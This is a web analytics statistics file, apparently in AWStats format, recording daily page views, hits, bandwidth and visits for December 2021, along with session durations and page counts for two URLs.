# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 30
20211201 6 6 4884 6
20211202 4 4 3256 4
20211203 11 11 8954 10
20211204 2 2 1628 2
20211206 4 4 3256 4
20211207 4 4 3256 4
20211208 2 2 1628 2
20211209 5 5 3256 5
20211210 2 2 1628 2
20211211 7 7 5698 2
20211212 3 3 2442 3
20211213 4 4 3256 4
20211214 4 4 3256 4
20211215 4 4 3256 4
20211216 8 8 6512 8
20211217 3 3 2442 3
20211218 4 4 3256 4
20211219 14 14 11396 10
20211220 41 41 33374 24
20211221 18 18 14652 12
20211222 11 11 8954 9
20211223 27 27 21978 13
20211224 4 4 3256 4
20211225 3 3 2442 3
20211226 7 7 10357 6
20211227 5 5 4070 5
20211228 6 6 4070 6
20211229 5 5 4070 5
20211230 7 7 5698 6
20211231 3 3 2442 3
END_DAY

# Session range - Number of visits
BEGIN_SESSION 3
30s-2mn 1
5mn-15mn 1
0s-30s 175
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 2
/ 227 183150 177 176
/site/ 1 5473 0 1
END_SIDER
